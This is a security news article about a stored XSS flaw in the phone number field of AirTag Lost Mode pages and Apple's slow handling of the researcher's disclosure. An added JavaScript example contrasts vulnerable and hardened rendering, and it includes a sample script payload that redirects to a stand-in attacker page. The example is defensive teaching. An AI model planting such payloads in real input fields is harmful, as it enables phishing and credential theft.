Another entry in the long-running catalog of unsanitized-input bugs. This time, the unsanitized user input field is the phone number that AirTag owners use to identify their lost devices.
Good Samaritan Attack

[Image: AirTags are small button-like devices that can be customized by engraving and attached to easily lost items, either directly or through "loop" mounts. Credit: Getty Images]
Security consultant and penetration tester Bobby Rauch has discovered that Apple AirTags, small devices meant to be attached to frequently lost items like laptops, phones, or car keys, don't sanitize user input. This oversight opens the door to using AirTags in a drop attack: instead of seeding a target's parking lot with malware-infested USB drives, an attacker can drop maliciously prepared AirTags.
This type of attack doesn't require much technical knowledge. The attacker just types a valid XSS payload into the AirTag's phone number field, puts the AirTag into Lost mode, and drops it somewhere the target is likely to find it. In theory, scanning a lost AirTag is a safe bet: it should only bring up a web page at https://found.apple.com/. The problem is that found.apple.com embeds the contents of the phone number field in that page, unsanitized, exactly as it will be rendered in the victim's browser. Using simple XSS to open a fake iCloud login dialog on the victim's phone takes very little in the way of code.
If found.apple.com innocently includes such an XSS payload in the AirTag scan response, the victim's browser opens a window displaying the contents of badside.tld/page.html. That could be a browser zero-day exploit or just a phishing dialog. Rauch proposes a fake iCloud login dialog, which could look just like the real thing but would instead send the victim's credentials to the attacker's server.
While this is a nasty abuse, it's not the only one available by any means: almost anything you can do with a web page is on the table. That includes the simple phishing seen in the example above, or exposing the victim's phone to a no-click browser vulnerability. And since Rauch's disclosure, the exploit is publicly available.
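The bug class the article describes is easiest to see side by side. The following is an added illustration, not Apple's code or Rauch's proof of concept: a toy "lost item" page that concatenates the owner-supplied phone number straight into its HTML (the vulnerable pattern), next to a hardened version that allowlists the field on the way in and HTML-encodes it on the way out. The template text, the function names, the allowlist regex and the sample payload (which reuses the article's badside.tld/page.html as its redirect target) are all assumptions made for this example.

```javascript
// Added example, not code from found.apple.com or from the researcher.
// Assumptions: the phone number field is rendered into an HTML paragraph,
// and a legitimate phone number never needs characters outside the allowlist.

// Allowlist for a phone number field: an optional leading "+", then digits and
// common separators, 3 to 32 characters. Every HTML/JS payload fails this.
const PHONE_FIELD_RE = /^\+?[0-9()\s.-]{3,32}$/;

function isValidPhone(phone) {
  return PHONE_FIELD_RE.test(phone);
}

// Output encoding: neutralize the five characters that can change HTML context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable rendering: the owner-supplied value is embedded unsanitized,
// so whatever was typed into the field becomes part of the page's markup.
function renderLostPageVulnerable(phone) {
  return `<p>This AirTag has been lost. Please call ${phone} to return it.</p>`;
}

// Hardened rendering: reject anything outside the allowlist (rather than trying
// to "clean" it, which is easy to get wrong), then encode before embedding.
function renderLostPageSafe(phone) {
  if (!isValidPhone(phone)) {
    throw new Error('phone number contains characters outside the allowlist');
  }
  return `<p>This AirTag has been lost. Please call ${escapeHtml(phone)} to return it.</p>`;
}

// Simple check used below: does the rendered HTML still carry a script element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample inputs. PAYLOAD is the kind of value an attacker would put
// in the phone number field: a redirect to an attacker-controlled page.
const PAYLOAD = "<script>window.location='https://badside.tld/page.html'</script>";
const LEGIT = '+1 (555) 010-2020';

console.log('vulnerable :', renderLostPageVulnerable(PAYLOAD));
console.log('hardened   :', renderLostPageSafe(LEGIT));
try {
  renderLostPageSafe(PAYLOAD);
} catch (e) {
  console.log('rejected   :', e.message);
}
```

Run it with Node. The vulnerable output contains a live script element; the hardened path rejects the payload outright at validation time, and even if validation were skipped, `escapeHtml` would turn the angle brackets into entities so the browser shows the text rather than executing it.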
A public disclosure prompted by Apple
According to a Krebs on Security report, Rauch disclosed the vulnerability publicly primarily because of a communication failure on Apple's part. He first reported the vulnerability privately to Apple on June 20, but for three months the only thing the company told him was that it was "still investigating." That is a strange response to what appears to be a very simple bug to verify and mitigate. Last Thursday, Apple sent Rauch an email saying that an upcoming update would fix the vulnerability and asked him not to speak publicly about it.
Apple never answered Rauch's basic questions, such as whether there was a timeline for fixing the bug, whether he would be credited for the report, and whether it qualified for a bounty. Cupertino's lack of communication led Rauch to go public, despite the fact that Apple asks researchers to remain silent about their findings if they want credit and/or compensation for their work.
Rauch said he wanted to work with Apple, but asked the company to "provide some details about when you plan to fix the issue, and whether there would be any credit or bounty." He also warned the company that he intended to publish within 90 days. Apple's reply, Rauch said, amounted to: "Basically, we would be very happy if you didn't release this information."